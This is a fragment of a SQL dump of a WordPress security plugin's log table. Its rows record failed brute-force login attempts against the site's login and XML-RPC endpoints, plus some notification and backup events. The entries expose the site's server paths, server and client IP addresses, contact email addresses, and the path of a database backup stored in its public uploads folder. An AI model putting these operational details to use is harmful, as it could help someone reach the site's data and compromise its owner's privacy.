Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"80.82.122.216\";s:11:\"REMOTE_PORT\";s:5:\"43312\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFGgiqbKGlf1IVly7N4MQAAAUo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568753282.6726\";s:12:\"REQUEST_TIME\";s:10:\"1568753282\";}}','notice','2019-09-17 20:48:04','2019-09-17 20:48:03',18256704,19556336,'https://bintara.com.my/xmlrpc.php',1,0,'80.82.122.216'),(24737,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"37.247.54.2\";s:11:\"REMOTE_PORT\";s:5:\"59520\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFGjo75s89pqgR69SLTbgAAAZU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568753294.4929\";s:12:\"REQUEST_TIME\";s:10:\"1568753294\";}}','notice','2019-09-17 20:48:16','2019-09-17 20:48:15',17739824,19230056,'https://bintara.com.my/wp-login.php',1,0,'37.247.54.2'),(24738,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"37.247.54.2\";s:11:\"REMOTE_PORT\";s:5:\"60066\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFGko75s89pqgR69SLTcQAAAYA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568753298.0851\";s:12:\"REQUEST_TIME\";s:10:\"1568753298\";}}','notice','2019-09-17 20:48:19','2019-09-17 20:48:18',18256760,19557128,'https://bintara.com.my/xmlrpc.php',1,0,'37.247.54.2');
INSERT INTO `wpdp_itsec_logs` (`id`, `parent_id`, `module`, `code`, `data`, `type`, `timestamp`, `init_timestamp`, `memory_current`, `memory_peak`, `url`, `blog_id`, `user_id`, `remote_ip`) VALUES (24739,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"166.62.122.244\";s:11:\"REMOTE_PORT\";s:5:\"39738\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFITo75s89pqgR69SLULgAAAYI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568753742.7719\";s:12:\"REQUEST_TIME\";s:10:\"1568753742\";}}','notice','2019-09-17 20:55:44','2019-09-17 20:55:43',17739920,19230424,'https://bintara.com.my/wp-login.php',1,0,'166.62.122.244'),(24740,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"166.62.122.244\";s:11:\"REMOTE_PORT\";s:5:\"43446\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFIVo75s89pqgR69SLUMgAAAYw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568753751.0436\";s:12:\"REQUEST_TIME\";s:10:\"1568753751\";}}','notice','2019-09-17 20:55:52','2019-09-17 20:55:51',18255672,19554536,'https://bintara.com.my/xmlrpc.php',1,0,'166.62.122.244'),(23733,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"31.14.128.73\";s:11:\"REMOTE_PORT\";s:5:\"32866\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXeOhEgJZxitCRbj1aO4gwAAAA0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568116356.9887\";s:12:\"REQUEST_TIME\";s:10:\"1568116356\";}}','notice','2019-09-10 11:52:38','2019-09-10 11:52:37',17703216,19194232,'https://bintara.com.my/wp-login.php',1,0,'31.14.128.73'),(23734,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"31.14.128.73\";s:11:\"REMOTE_PORT\";s:5:\"33082\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXeOiPyvcQZLQWZenCYeMgAAAJA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568116360.5833\";s:12:\"REQUEST_TIME\";s:10:\"1568116360\";}}','notice','2019-09-10 11:52:42','2019-09-10 11:52:41',18219392,19516424,'https://bintara.com.my/xmlrpc.php',1,0,'31.14.128.73'),(23735,0,'notification_center','send_scheduled','a:2:{s:13:\"notifications\";a:1:{i:0;s:6:\"digest\";}s:6:\"silent\";b:0;}','debug','2019-09-10 20:51:56','2019-09-10 20:51:52',17753816,18215872,'https://bintara.com.my/wacom/',1,0,'40.77.167.69'),(23736,0,'notification_center','send::backup','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:33:\"[bintara.com.my/] Database Backup\";}','debug','2019-09-11 03:27:39','2019-09-11 03:27:05',19085656,71745696,'wp-cron',1,0,'103.6.198.69'),(23737,0,'backup','email-succeeded','a:5:{s:8:\"settings\";a:9:{s:9:\"all_sites\";b:0;s:6:\"method\";i:1;s:8:\"location\";s:84:\"/home/norfaiz/public_html/bintara.com.my/wp-content/uploads/ithemes-security/backups\";s:6:\"retain\";i:0;s:3:\"zip\";b:1;s:7:\"exclude\";a:2:{i:0;s:14:\"itsec_lockouts\";i:1;s:10:\"itsec_temp\";}s:7:\"enabled\";b:1;s:8:\"interval\";i:7;s:8:\"last_run\";i:1567567567;}s:12:\"mail_success\";b:1;s:4:\"file\";s:163:\"/home/norfaiz/public_html/bintara.com.my/wp-content/uploads/ithemes-security/backups/backup-bintara-solutions-sd-20190911-112706-vXKtdYBX5tWnE0oYANvb9epPsZ4TQk.sql\";s:11:\"output_file\";s:163:\"/home/norfaiz/public_html/bintara.com.my/wp-content/uploads/ithemes-security/backups/backup-bintara-solutions-sd-20190911-112706-vXKtdYBX5tWnE0oYANvb9epPsZ4TQk.zip\";s:4:\"size\";i:2747362;}','notice','2019-09-11 03:27:40','2019-09-11 03:27:05',22459024,71745696,'wp-cron',1,0,'103.6.198.69'),(24463,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.9.147.200\";s:11:\"REMOTE_PORT\";s:5:\"54516\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCTpw99C9j9bhK9KplS4wAAAQI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568707495.4918\";s:12:\"REQUEST_TIME\";s:10:\"1568707495\";}}','notice','2019-09-17 08:04:58','2019-09-17 08:04:56',18257176,19557312,'https://bintara.com.my/xmlrpc.php',1,0,'185.9.147.200'),(24464,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"151.80.147.11\";s:11:\"REMOTE_PORT\";s:5:\"48683\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCVIx@uZ4OC5N1Fn8FrPAAAAIc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568707875.4117\";s:12:\"REQUEST_TIME\";s:10:\"1568707875\"